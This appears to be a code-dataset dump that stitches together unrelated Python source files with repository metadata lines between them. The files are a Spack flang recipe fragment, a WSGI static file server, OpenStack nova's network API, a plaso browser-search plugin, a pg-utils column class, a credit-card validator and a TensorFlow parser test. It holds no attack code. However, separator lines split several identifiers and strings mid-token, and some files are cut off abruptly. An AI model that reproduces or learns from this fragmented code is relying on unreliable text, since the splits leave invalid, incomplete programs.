self.spec['llvm'].prefix.bin, 'clang'),
'-DCMAKE_CXX_COMPILER=%s' % os.path.join(
self.spec['llvm'].prefix.bin, 'clang++'),
'-DCMAKE_Fortran_COMPILER=%s' % os.path.join(
self.spec['llvm'].prefix.bin, 'flang'),
'-DFLANG_LIBOMP=%s' % find_libraries(
'libomp', root=self.spec['llvm'].prefix.lib)
]
return options
@run_after('install')
def post_install(self):
# we are installing flang in a path different from llvm, so we
# create a wrapper with -L for e.g. libflangrti.so and -I for
# e.g. iso_c_binding.mod. -B is needed to help flang to find
# flang1 and flang2. rpath_arg is needed so that executables
# generated by flang can find libflang later.
flang = os.path.join(self.spec.prefix.bin, 'flang')
with open(flang, 'w') as out:
out.write('#!/bin/bash\n')
out.write(
'{0} -I{1} -L{2} -L{3} {4}{5} {6}{7} -B{8} "$@"\n'.format(
self.spec['llvm'].prefix.bin.flang,
self.prefix.include, self.prefix.lib,
self.spec['pgmath'].prefix.lib,
self.compiler.fc_rpath_arg, self.prefix.lib,
self.compiler.fc_rpath_arg,
|
self.spec['pgmath'].prefix.lib, self.spec.prefix.bin))
out.close()
chmod = which('chmod')
chmod('+x', flang)
def setup_environment(self, spack_env, run_env):
|
# to find llvm's libc++.so
spack_env.set('LD_LIBRARY_PATH', self.spec['llvm'].prefix.lib)
run_env.set('FC', join_path(self.spec.prefix.bin, 'flang'))
run_env.set('F77', join_path(self.spec.prefix.bin, 'flang'))
run_env.set('F90', join_path(self.spec.prefix.bin, 'flang'))
|
gholt/python-brim
|
brim/wsgi_fs.py
|
Python
|
apache-2.0
| 9,657
| 0.000518
|
"""A WSGI application that simply serves up files from the file system.
.. warning::
This is an early version of this module. It has no tests, limited
documentation, and is subject to major changes.
Configuration Options::
[wsgi_fs]
call = brim.wsgi_fs.WSGIFS
# path = <path>
# The request path to match and serve; any paths that do not begin
# with this value will be passed on to the next WSGI app in the
# chain. Default: /
# serve_path = <path>
# The local file path containing files to serve.
"""
"""Copyright and License.
Copyright 2014 Gregory Holt
Licensed under the Apache License, Version 2.0 (the "License"); you may
not use this file except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import mimetypes
import os
import time
from cgi import escape
from brim import http
MONTH_ABR = (
'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct',
'Nov', 'Dec')
WEEKDAY_ABR = ('Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun')
def http_date_time(when):
"""Returns a date and time formatted as per HTTP RFC 2616."""
gmtime = time.gmtime(when)
return '%s, %02d %3s %4d %02d:%02d:%02d GMT' % (
WEEKDAY_ABR[gmtime.tm_wday], gmtime.tm_mday,
MONTH_ABR[gmtime.tm_mon - 1], gmtime.tm_year, gmtime.tm_hour,
gmtime.tm_min, gmtime.tm_sec)
def _openiter(path, chunk_size, total_size):
left = total_size
with open(path, 'rb') as source:
while True:
chunk = source.read(min(chunk_size, left))
if not chunk:
break
left -= len(chunk)
yield chunk
if left >= chunk_size:
chunk = ' ' * chunk_size
while left >= chunk_size:
left -= chunk_size
yield chunk
if left:
yield ' ' * left
class WSGIFS(object):
"""A WSGI app for serving up files from the file system.
See :py:mod:`brim.wsgi_fs` for more information.
:param name: The name of the app.
:param parsed_conf: The conf result from :py:meth:`parse_conf`.
:param next_app: The next WSGI app in the chain.
"""
def __init__(self, name, parsed_conf, next_app):
self.name = name
"""The name of the app."""
self.next_app = next_app
"""The next WSGI app in the chain."""
self.path = parsed_conf['path']
"""The request path to match and serve.
Any paths that do not begin with this value will be passed on to
the next WSGI app in the chain. The attribute will have leading
and trailing foward slashes removed.
"""
self.serve_path = parsed_conf['serve_path']
"""The local file path containing files to serve."""
def __call__(self, env, start_response):
"""Handles incoming WSGI requests.
Requests that start with the configured path simply serve up any
files under the configured location on the file system. Other
requests are passed on to the next WSGI app in the chain.
:param env: The WSGI env as per the spec.
:param start_response: The WSGI start_response as per the spec.
:returns: Calls *start_response* and returns an iterable as per
the WSGI spec.
"""
path = os.path.normpath(env['PATH_INFO'].strip('/'))
if path == self.path:
path = '.'
elif path.startswith(self.path + '/'):
path = path[len(self.path) + 1:]
if not path:
path = '.'
elif self.path:
return self.next_app(env, start_response)
if path == '..' or path.startswith('..' + os.path.sep):
return http.HTTPForbidden()(env, start_response)
path = os.path.join(self.serve_path, path)
if not os.path.exists(path):
return http.HTTPNotFound()(env, start_response)
if os.path.isdir(path):
if not env['PATH_INFO'].endswith('/'):
return http.HTTPMovedPermanently(
headers={'Location': env['PATH_INFO'] + '/'})(
env, start_response)
dirpath = path
path = os.path.join(path, 'index.html')
if not os.path.exists(path):
return self.listing(dirpath, env, start_response)
content_type = mimetypes.guess_type(path)[0] or \
'application/octet-stream'
stat = os.stat(path)
if not stat.st_size:
start_response(
'204 No Content',
[('Content-Length', '0'), ('Content-Type', content_type)])
start_response(
'200 OK',
[('Content-Length', str(stat.st_size)),
('Content-Type', content_type),
('Last-Modified',
http_date_time(min(stat.st_mtime, time.time())))])
if env['REQUEST_METHOD'] == 'HEAD':
return ''
return _openiter(path, 65536, stat.st_size)
def listing(self, path, env, start_response):
if not path.startswith(self.serve_path + '/'):
return http.HTTPForbidden()(env, start_response)
rpath = '/' + self.path + '/' + path[len(self.serve_path) + 1:]
epath = escape(rpath)
body = (
'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 '
'Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\n'
'<html>\n'
' <head>\n'
' <title>Listing of %s</title>\n'
' <style type="text/css">\n'
' h1 {font-size: 1em; font-weight: bold;}\n'
' th {text-align: left; padding: 0px 1em 0px 1em;}\n'
' td {padding: 0px 1em 0px 1em;}\n'
|
' a {text-decoration: none;}\n'
' .colsize {text-align: right;}\n'
' </style>\n'
' </head>\n'
' <body>\n'
' <h1 id="title">Listing of %s</h1>\n'
' <table id="listing">\n'
' <tr id="heading">\n'
' <th class="colname">Name</th>\n'
' <th class="colsize">Size</th>\n'
' <th class="coldate">Date</th>\n'
' </tr>\n' % (epath, epath))
if env['P
|
ATH_INFO'].count('/') > 1:
body += (
' <tr id="parent" class="item">\n'
' <td class="colname"><a href="../">../</a></td>\n'
' <td class="colsize"> </td>\n'
' <td class="coldate"> </td>\n'
' </tr>\n')
listing = sorted(os.listdir(path))
for item in listing:
itempath = os.path.join(path, item)
if os.path.isdir(itempath):
body += (
' <tr class="item subdir">\n'
' <td class="colname"><a href="%s">%s</a></td>\n'
' <td class="colsize"> </td>\n'
' <td class="coldate"> </td>\n'
' </tr>\n' % (http.quote(item), escape(item)))
for item in listing:
itempath = os.path.join(path, item)
if os.path.isfile(itempath):
ext = os.path.splitext(item)[1].lstrip('.')
size = os.path.getsize(itempath)
mtime = os.path.getmtime(itempath)
body += (
' <tr class="item %s">\n'
' <td class="colname"><a href="%s">%s</a></td>\n'
' <td class="colsize">'
'<script type="text/javascript">'
'document.write(new Number(%s).toLocaleString());'
'</script></td>\n'
' <td class="coldate">'
'<script type="text/javascript">'
'document.write(new Date(%s * 1000).toLo
|
vmthunder/nova
|
nova/network/api.py
|
Python
|
apache-2.0
| 23,489
| 0.000341
|
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS
|
IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# Licens
|
e for the specific language governing permissions and limitations
# under the License.
import functools
from oslo.config import cfg
from nova.compute import flavors
from nova import exception
from nova.i18n import _
from nova.network import base_api
from nova.network import floating_ips
from nova.network import model as network_model
from nova.network import rpcapi as network_rpcapi
from nova import objects
from nova.objects import base as obj_base
from nova.openstack.common import log as logging
from nova import policy
from nova import utils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
def wrap_check_policy(func):
"""Check policy corresponding to the wrapped methods prior to execution."""
@functools.wraps(func)
def wrapped(self, context, *args, **kwargs):
action = func.__name__
check_policy(context, action)
return func(self, context, *args, **kwargs)
return wrapped
def check_policy(context, action):
target = {
'project_id': context.project_id,
'user_id': context.user_id,
}
_action = 'network:%s' % action
policy.enforce(context, _action, target)
class API(base_api.NetworkAPI):
"""API for doing networking via the nova-network network manager.
This is a pluggable module - other implementations do networking via
other services (such as Neutron).
"""
def __init__(self, **kwargs):
self.network_rpcapi = network_rpcapi.NetworkAPI()
helper = utils.ExceptionHelper
# NOTE(vish): this local version of floating_manager has to convert
# ClientExceptions back since they aren't going over rpc.
self.floating_manager = helper(floating_ips.LocalManager())
super(API, self).__init__(**kwargs)
@wrap_check_policy
def get_all(self, context):
"""Get all the networks.
If it is an admin user then api will return all the
networks. If it is a normal user and nova Flat or FlatDHCP
networking is being used then api will return all
networks. Otherwise api will only return the networks which
belong to the user's project.
"""
if "nova.network.manager.Flat" in CONF.network_manager:
project_only = "allow_none"
else:
project_only = True
try:
return objects.NetworkList.get_all(context,
project_only=project_only)
except exception.NoNetworksFound:
return []
@wrap_check_policy
def get(self, context, network_uuid):
return objects.Network.get_by_uuid(context.elevated(), network_uuid)
@wrap_check_policy
def create(self, context, **kwargs):
return self.network_rpcapi.create_networks(context, **kwargs)
@wrap_check_policy
def delete(self, context, network_uuid):
return self.network_rpcapi.delete_network(context, network_uuid, None)
@wrap_check_policy
def disassociate(self, context, network_uuid):
network = self.get(context, network_uuid)
objects.Network.disassociate(context, network.id,
host=True, project=True)
@wrap_check_policy
def get_fixed_ip(self, context, id):
return objects.FixedIP.get_by_id(context, id)
@wrap_check_policy
def get_fixed_ip_by_address(self, context, address):
return objects.FixedIP.get_by_address(context, address)
@wrap_check_policy
def get_floating_ip(self, context, id):
if not utils.is_int_like(id):
raise exception.InvalidID(id=id)
return objects.FloatingIP.get_by_id(context, id)
@wrap_check_policy
def get_floating_ip_pools(self, context):
return objects.FloatingIP.get_pool_names(context)
@wrap_check_policy
def get_floating_ip_by_address(self, context, address):
return objects.FloatingIP.get_by_address(context, address)
@wrap_check_policy
def get_floating_ips_by_project(self, context):
return objects.FloatingIPList.get_by_project(context,
context.project_id)
@wrap_check_policy
def get_floating_ips_by_fixed_address(self, context, fixed_address):
floating_ips = objects.FloatingIPList.get_by_fixed_address(
context, fixed_address)
return [str(floating_ip.address) for floating_ip in floating_ips]
@wrap_check_policy
def get_instance_id_by_floating_address(self, context, address):
fixed_ip = objects.FixedIP.get_by_floating_address(context, address)
if fixed_ip is None:
return None
else:
return fixed_ip.instance_uuid
@wrap_check_policy
def get_vifs_by_instance(self, context, instance):
vifs = objects.VirtualInterfaceList.get_by_instance_uuid(context,
instance.uuid)
for vif in vifs:
if vif.network_id is not None:
network = objects.Network.get_by_id(context, vif.network_id,
project_only='allow_none')
vif.net_uuid = network.uuid
return vifs
@wrap_check_policy
def get_vif_by_mac_address(self, context, mac_address):
vif = objects.VirtualInterface.get_by_address(context,
mac_address)
if vif.network_id is not None:
network = objects.Network.get_by_id(context, vif.network_id,
project_only='allow_none')
vif.net_uuid = network.uuid
return vif
@wrap_check_policy
def allocate_floating_ip(self, context, pool=None):
"""Adds (allocates) a floating ip to a project from a pool."""
return self.floating_manager.allocate_floating_ip(context,
context.project_id, False, pool)
@wrap_check_policy
def release_floating_ip(self, context, address,
affect_auto_assigned=False):
"""Removes (deallocates) a floating ip with address from a project."""
return self.floating_manager.deallocate_floating_ip(context, address,
affect_auto_assigned)
def disassociate_and_release_floating_ip(self, context, instance,
floating_ip):
"""Removes (deallocates) and deletes the floating ip.
This api call was added to allow this to be done in one operation
if using neutron.
"""
address = floating_ip['address']
if floating_ip.get('fixed_ip_id'):
try:
self.disassociate_floating_ip(context, instance, address)
except exception.FloatingIpNotAssociated:
msg = ("Floating ip %s has already been disassociated, "
"perhaps by another concurrent action.") % address
LOG.debug(msg)
# release ip from project
return self.release_floating_ip(context, address)
@wrap_check_policy
@base_api.refresh_cache
def associate_floating_ip(self, context, instance,
floating_address, fixed_address,
affect_auto_assigned=False):
"""Associates a floating ip with a fixed ip.
Ensures floating ip is allocated to the project in context.
|
iwm911/plaso
|
plaso/analysis/browser_search.py
|
Python
|
apache-2.0
| 6,727
| 0.008771
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2013 The Plaso Project Authors.
# Please see the AUTHORS file for details on individual authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A plugin that extracts browser history from events."""
import collections
import logging
import urllib
from plaso import filters
from plaso.analysis import interface
from plaso.lib import event
from plaso.lib import eventdata
def ScrubLine(line):
"""Scrub the line of most obvious HTML codes.
An attempt at taking a line and swapping all instances
of %XX which represent a character in hex with it's
unicode character.
Args:
line: The string that we are about to "fix".
Returns:
String that has it's %XX hex codes swapped for text.
"""
if not line:
return ''
try:
return unicode(urllib.unquote(str(line)), 'utf-8')
except UnicodeDecodeError:
logging.warning(u'Unable to decode line: {0:s}'.format(line))
return line
class FilterClass(object):
"""A class that contains all the parser functions."""
@classmethod
def _GetBetweenQEqualsAndAmbersand(cls, string):
"""Return back string that is defined 'q=' and '&'."""
if 'q=' not in string:
return string
_, _, line = string.partition('q=')
before_and, _, _ = line.partition('&')
if not before_and:
return line
return before_and.split()[0]
@classmethod
def _SearchAndQInLine(cls, string):
"""Return a bool indicating if the words q= a
|
nd search appear in string."""
return 'search' in string and 'q=' in string
@classmethod
def GoogleSearch(cls, url):
"""Return back the extracted string."""
if not cls._SearchAndQInLine(url):
return
line = cls._GetBetweenQEqualsAndAmbersand(url)
if not line:
return
return line.replace('+', ' ')
@classmethod
def YouTube(cls, url):
"""Return back the extracted string."""
return cls.GenericSearch(url)
@classmethod
def BingSearch(cls, url):
"
|
""Return back the extracted string."""
return cls.GenericSearch(url)
@classmethod
def GenericSearch(cls, url):
"""Return back the extracted string from a generic search engine."""
if not cls._SearchAndQInLine(url):
return
return cls._GetBetweenQEqualsAndAmbersand(url).replace('+', ' ')
@classmethod
def Yandex(cls, url):
"""Return back the results from Yandex search engine."""
if 'text=' not in url:
return
_, _, line = url.partition('text=')
before_and, _, _ = line.partition('&')
if not before_and:
return
yandex_search_url = before_and.split()[0]
return yandex_search_url.replace('+', ' ')
@classmethod
def DuckDuckGo(cls, url):
"""Return back the extracted string."""
if not 'q=' in url:
return
return cls._GetBetweenQEqualsAndAmbersand(url).replace('+', ' ')
@classmethod
def Gmail(cls, url):
"""Return back the extracted string."""
if 'search/' not in url:
return
_, _, line = url.partition('search/')
first, _, _ = line.partition('/')
second, _, _ = first.partition('?compose')
return second.replace('+', ' ')
class AnalyzeBrowserSearchPlugin(interface.AnalysisPlugin):
"""Analyze browser search entries from events."""
NAME = 'browser_search'
# Indicate that we do not want to run this plugin during regular extraction.
ENABLE_IN_EXTRACTION = False
# Here we define filters and callback methods for all hits on each filter.
FILTERS = (
(('url iregexp "(www.|encrypted.|/)google." and url contains "search"'),
'GoogleSearch'),
('url contains "youtube.com"', 'YouTube'),
(('source is "WEBHIST" and url contains "bing.com" and url contains '
'"search"'), 'BingSearch'),
('url contains "mail.google.com"', 'Gmail'),
(('source is "WEBHIST" and url contains "yandex.com" and url contains '
'"yandsearch"'), 'Yandex'),
('url contains "duckduckgo.com"', 'DuckDuckGo')
)
def __init__(self, pre_obj, incoming_queue, outgoing_queue):
"""Constructor for the browser history plugin."""
super(AnalyzeBrowserSearchPlugin, self).__init__(
pre_obj, incoming_queue, outgoing_queue)
self._filter_dict = {}
self._counter = collections.Counter()
for filter_str, call_back in self.FILTERS:
filter_obj = filters.GetFilter(filter_str)
call_back_obj = getattr(FilterClass, call_back, None)
if filter_obj and call_back_obj:
self._filter_dict[filter_obj] = (call_back, call_back_obj)
def ExamineEvent(self, event_object):
"""Take an EventObject and send it through analysis."""
# This event requires an URL attribute.
url_attribute = getattr(event_object, 'url', None)
if not url_attribute:
return
# Check if we are dealing with a web history event.
source, _ = eventdata.EventFormatterManager.GetSourceStrings(event_object)
if source != 'WEBHIST':
return
for filter_obj, call_backs in self._filter_dict.items():
call_back_name, call_back_object = call_backs
if filter_obj.Match(event_object):
returned_line = ScrubLine(call_back_object(url_attribute))
if not returned_line:
continue
self._counter[u'{}:{}'.format(call_back_name, returned_line)] += 1
def CompileReport(self):
"""Compiles a report of the analysis.
Returns:
The analysis report (instance of AnalysisReport).
"""
report = event.AnalysisReport()
results = {}
for key, count in self._counter.iteritems():
search_engine, _, search_term = key.partition(':')
results.setdefault(search_engine, {})
results[search_engine][search_term] = count
report.report_dict = results
lines_of_text = []
for search_engine, terms in sorted(results.items()):
lines_of_text.append(u' == ENGINE: {0:s} =='.format(search_engine))
for search_term, count in sorted(
terms.iteritems(), key=lambda x: (x[1], x[0]), reverse=True):
lines_of_text.append(u'{0:d} {1:s}'.format(count, search_term))
# An empty string is added to have SetText create an empty line.
lines_of_text.append(u'')
report.SetText(lines_of_text)
return report
|
jackmaney/pg-utils
|
pg_utils/column/base.py
|
Python
|
mit
| 10,187
| 0.002945
|
import numpy as np
import pandas as pd
from lazy_property import LazyProperty
from . import _describe_template
from .plot import Plotter
from .. import bin_counts
from .. import numeric_datatypes, _pretty_print
from ..util import seaborn_required
class Column(object):
"""
In Pandas, a column of a DataFrame is represented as a Series.
Similarly, a column in a database table is represented by
an object from this class.
Note that the Series represented by these columns have the default index (ie non-negative, consecutive integers starting at zero). Thus, for the portion of the Pandas Series API mocked here, we need not worry about multilevel (hierarchical) indices.
"""
def __init__(self, name, parent_table):
"""
:param str name: The name of the column. Required.
:param pg_utils.table.Table parent_table: The table to which this column belongs. Required.
"""
self.parent_table = parent_table
self.name = name
self.is_numeric = parent_table._all_column_data_types[name] in numeric_datatypes
self.plot = Plotter(self)
def select_all_query(self):
"""
Provides the SQL used when selecting everything from this column.
:return: The SQL statement.
:rtype: str
"""
return "select {} from {}".format(self, self.parent_table)
def sort_values(self, ascending=True, limit=None, **sql_kwargs):
"""
Mimics the method `pandas.Series.sort_values <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.sort_values.html#pandas.Series.sort_values>`_.
:param int|None limit: Either a positive integer for the number of rows to take or ``None`` to take all.
:param bool ascending: Sort ascending vs descending.
:param dict sql_kwargs: A dictionary of keyword arguments passed into `pandas.read_sql <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.read_sql.html>`_.
:return: The resulting series.
:rtype: pandas.Series
"""
if limit is not None and (not isinstance(limit, int) or limit <= 0):
raise ValueError("limit must be a positive integer or None (got {})".format(limit))
sql = self.select_all_query() + " order by 1"
if not ascending:
sql += " desc"
if limit is not None:
sql += " limit {}".format(limit)
return pd.read_sql(sql, self.parent_table.conn, **sql_kwargs)[self.name]
def unique(self):
"""
Returns an array of unique values in this column. Includes ``null`` (represented as ``None``).
:return: The unique values.
:rtype: np.array
"""
cur = self.parent_table.conn.cursor()
cur.execute("select distinct {} from {}".format(self, self.parent_table))
return np.array([x[0] for x in cur.fetchall()])
def hist(self, **kwargs):
return self.plot.hist(**kwargs)
def head(self, num_rows=10):
"""
Fetches some values of this column.
:param int|str num_rows: Either a positive integer number of values or the string `"all"` to fetch all values
:return: A NumPy array of the values
:rtype: np.array
"""
if (isinstance(num_rows, int) and num_rows < 0) or \
num_rows != "all":
raise ValueError("num_rows must be a positive integer or the string 'all'")
query = self.select_all_query()
if num_rows != "all":
query += " limit {}".format(num_rows)
cur = self.parent_table.conn.cursor()
cur.execute(query)
return np.array([x[0] for x in cur.fetchall()])
@LazyProperty
def is_unique(self):
"""
Determines whether or not the values of this column are all unique (ie whether this column is a unique identifier for the table).
:return: Whether or not this column contains unique values.
:rtype: bool
"""
cur = self.parent_table.conn.cursor()
cur.execute("""select {}
from {}
group by 1 having count(1) > 1""".format(self, self.parent_table))
return cur.fetchone() is None
@LazyProperty
def dtype(self):
"""
The ``dtype`` of this column (represented as a string).
:return: The ``dtype``.
:rtype: str
"""
return self.parent_table._all_column_data_types[self.name]
def _get_describe_query(self, percentiles=None, type_="continuous"):
if type_.lower() not in ["continuous", "discrete"]:
raise ValueError("The 'type_' parameter must be 'continuous' or 'discrete'")
if not self.is_numeric:
return None
if percentiles is None:
percentiles = [0.25, 0.5, 0.75]
elif not bool(percentiles):
percentiles = []
if not isinstance(percentiles, (list, tuple)):
percentiles = [percentiles]
if any([x < 0 or x > 1 for x in percentiles]):
raise ValueError(
"The `percentiles` attribute must be None or consist of numbers between 0 and 1 (got {})".format(
percentiles))
percentiles = sorted([float("{0:.2f}".format(p)) for p in percentiles if p > 0])
suffix = "cont" if type_.lower() == "continuous" else "desc"
query = _describe_template.render(column=self, percentiles=percentiles,
suffix=suffix, table=self.parent_table)
if self.parent_table.debug:
_pretty_print(query)
return query
def describe(self, percentiles=None, type_="continuous"):
"""
This mocks the method `pandas.Series.describe`, and provides
a series with the same data (just calculated by the database).
:param None|list[float] percentiles: A list of percentiles to evaluate (with numbers between 0 and 1). If not specified, quartiles (0.25, 0.5, 0.75) are used.
:param str type_: Specifies whether the percentiles are to be taken as discrete or continuous. Must be one of `"discrete"` or `"continuous"`.
:return: A series returning the description of the column, in the same format as ``pandas.Series.describe``.
:rtype: pandas.Series
"""
if percentiles is None:
percentiles = [0.25, 0.5, 0.75]
cur = self.parent_table.conn.cursor()
cur.execute(self._get_describe_query(percentiles=percentiles, type_=type_))
index = ["count", "mean", "std_dev", "minimum"] + \
["{}%".format(int(100 * p)) for p in percentiles] + \
["maximum"]
return pd.Series(cur.fetchone()[1:], index=index)
@seaborn_required
def distplot(self, bins=None, **kwargs):
"""
Produces a ``distplot``. See `the seaborn docs <http://stanford.edu/~mwaskom/software/seaborn/generated/seaborn.distplot.html>`_ on ``distplot`` for more information.
Note that this requires Seaborn in order to function.
:param int|None bins: The number of bins to use. If unspecified, the `Freedman-Diaconis rule <https://en.wikipedia.org/wiki/Freedman%E2%80%93Diaconis_rule>`_ will be used to determine the number of bins.
:param dict kwargs: A dictionary of options to pass on to `seaborn.distplot <http://stanford.edu/~mwaskom/software/seaborn/generated/seaborn.distplot.html>`_.
"""
import seaborn
bc = bin_counts.counts(self, bins=bins)
n = sum([entry[2] for entry in bc])
left = np.zeros(n)
right = np.zeros(n)
overall_index = 0
for entry in bc:
for i in range(entry[2]):
|
left[overall_index] = entry[0]
right[overall_index] = entry[1]
|
overall_index += 1
# We'll take our overall data points to be in the midpoint
# of each binning interval
# TODO: make this more configurable (left, right, etc)
return seaborn.distplot((left + right) / 2.0, **kwargs)
@LazyProperty
def values(self):
"""
Mocks the method `pandas.Series.
|
orokusaki/pycard
|
pycard/card.py
|
Python
|
mit
| 7,293
| 0
|
import re
from calendar import monthrange
import datetime
class Card(object):
"""
A credit card that may be valid or invalid.
"""
# A regexp for matching non-digit values
non_digit_regexp = re.compile(r'\D')
# A mapping from common credit card brands to their number regexps
BRAND_VISA = 'visa'
BRAND_MASTERCARD = 'mastercard'
BRAND_AMEX = 'amex'
BRAND_DISCOVER = 'discover'
BRAND_DANKORT = 'dankort'
BRAND_MAESTRO = 'maestro'
BRAND_DINERS = 'diners'
BRAND_UNKNOWN = u'unknown'
BRANDS = {
BRAND_VISA: re.compile(r'^4\d{12}(\d{3})?$'),
BRAND_MASTERCARD: re.compile(r'''
^(5[1-5]\d{4}|677189)\d{10}$| # Traditional 5-series + RU support
^(222[1-9]|2[3-6]\d{2}|27[0-1]\d|2720)\d{12}$ # 2016 2-series
''', re.VERBOSE),
BRAND_AMEX: re.compile(r'^3[47]\d{13}$'),
BRAND_DISCOVER: re.compile(r'^(6011|65\d{2})\d{12}$'),
BRAND_DANKORT: re.compile(r'^(5019)\d{12}$'),
BRAND_MAESTRO:
re.compile(r'^(?:5[0678]\d\d|6304|6390|67\d\d)\d{8,15}$'),
BRAND_DINERS:
re.compile(r'^3(?:0[0-5]|[68][0-9])[0-9]{11}$'),
}
FRIENDLY_BRANDS = {
BRAND_VISA: 'Visa',
BRAND_MASTERCARD: 'MasterCard',
BRAND_AMEX: 'American Express',
BRAND_DISCOVER: 'Discover',
BRAND_DANKORT: 'Dankort',
BRAND_MAESTRO: 'Maestro',
BRAND_DINERS: 'Diners Club',
}
# Common test credit cards
TESTS = (
'4444333322221111',
'378282246310005',
'371449635398431',
'378734493671000',
'30569309025904',
'38520000023237',
'6011111111111117',
'6011000990139424',
'555555555554444',
'5105105105105100',
'4111111111111111',
'4012888888881881',
'4222222222222',
)
# Stripe test credit cards
TESTS += (
'4242424242424242',
)
def __init__(self, number, month, year, cvc, holder=None):
"""
Attaches the provided card data and holder to the card after removing
non-digits from the provided number.
"""
self.number = self.non_digit_regexp.sub('', number)
self.exp_date = ExpDate(month, year)
self.cvc = cvc
self.holder = holder
def __repr__(self):
"""
Returns a typical repr with a simple representation of the masked card
number and the exp date.
"""
return u'<Card brand={b} number={n}, exp_date={e}>'.format(
b=self.brand,
n=self.mask,
e=self.exp_date.mmyyyy
)
@property
def mask(self):
"""
Returns the credit card number with each of the number's digits but the
first six and the last four digits replaced by an X, formatted the way
they appear on their respective brands' cards.
"""
# If the card is invalid, return an "invalid" message
if not self.is_mod10_valid:
return u'invalid'
# If the card is an Amex, it will have special formatting
if self.brand == self.BRAND_AMEX:
return u'XXXX-XXXXXX-X{e}'.format(e=self.number[11:15])
# All other cards
return u'XXXX-XXXX-XXXX-{e}'.format(e=self.number[12:16])
@property
def brand(self):
"""
Returns the brand of the card, if applicable, else an "unknown" brand.
"""
# Check if the card is of known type
for brand, regexp in self.B
|
RANDS.items():
if regexp.match(self.number):
return brand
|
# Default to unknown brand
return self.BRAND_UNKNOWN
@property
def friendly_brand(self):
"""
Returns the human-friendly brand name of the card.
"""
return self.FRIENDLY_BRANDS.get(self.brand, 'unknown')
@property
def is_test(self):
"""
Returns whether or not the card's number is a known test number.
"""
return self.number in self.TESTS
@property
def is_expired(self):
"""
Returns whether or not the card is expired.
"""
return self.exp_date.is_expired
@property
def is_valid(self):
"""
Returns whether or not the card is a valid card for making payments.
"""
return not self.is_expired and self.is_mod10_valid
@property
def is_mod10_valid(self):
"""
Returns whether or not the card's number validates against the mod10
algorithm (Luhn algorithm), automatically returning False on an empty
value.
"""
# Check for empty string
if not self.number:
return False
# Run mod10 on the number
dub, tot = 0, 0
for i in range(len(self.number) - 1, -1, -1):
for c in str((dub + 1) * int(self.number[i])):
tot += int(c)
dub = (dub + 1) % 2
return (tot % 10) == 0
class ExpDate(object):
"""
An expiration date of a credit card.
"""
def __init__(self, month, year):
"""
Attaches the last possible datetime for the given month and year, as
well as the raw month and year values.
"""
# Attach month and year
self.month = month
self.year = year
# Get the month's day count
weekday, day_count = monthrange(year, month)
# Attach the last possible datetime for the provided month and year
self.expired_after = datetime.datetime(
year,
month,
day_count,
23,
59,
59,
999999
)
def __repr__(self):
"""
Returns a typical repr with a simple representation of the exp date.
"""
return u'<ExpDate expired_after={d}>'.format(
d=self.expired_after.strftime('%m/%Y')
)
@property
def is_expired(self):
"""
Returns whether or not the expiration date has passed in American Samoa
(the last timezone).
"""
# Get the current datetime in UTC
utcnow = datetime.datetime.utcnow()
# Get the datetime minus 11 hours (Samoa is UTC-11)
samoa_now = utcnow - datetime.timedelta(hours=11)
# Return whether the exipred after time has passed in American Samoa
return samoa_now > self.expired_after
@property
def mmyyyy(self):
"""
Returns the expiration date in MM/YYYY format.
"""
return self.expired_after.strftime('%m/%Y')
@property
def mmyy(self):
"""
Returns the expiration date in MM/YY format (the same as is printed on
cards.
"""
return self.expired_after.strftime('%m/%y')
@property
def MMYY(self):
"""
Returns the expiration date in MMYY format
"""
return self.expired_after.strftime('%m%y')
@property
def mm(self):
"""
Returns the expiration date in MM format.
"""
return self.expired_after.strftime('%m')
@property
def yyyy(self):
"""
Returns the expiration date in YYYY format.
"""
return self.expired_after.strftime('%Y')
|
nburn42/tensorflow
|
tensorflow/contrib/autograph/pyct/parser_test.py
|
Python
|
apache-2.0
| 1,514
| 0.003303
|
#
|
Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
|
or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for parser module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import textwrap
from tensorflow.contrib.autograph.pyct import parser
from tensorflow.python.platform import test
class ParserTest(test.TestCase):
def test_parse_entity(self):
def f(x):
return x + 1
mod, _ = parser.parse_entity(f)
self.assertEqual('f', mod.body[0].name)
def test_parse_str(self):
mod = parser.parse_str(
textwrap.dedent("""
def f(x):
return x + 1
"""))
self.assertEqual('f', mod.body[0].name)
def test_parse_expression(self):
node = parser.parse_expression('a.b')
self.assertEqual('a', node.value.id)
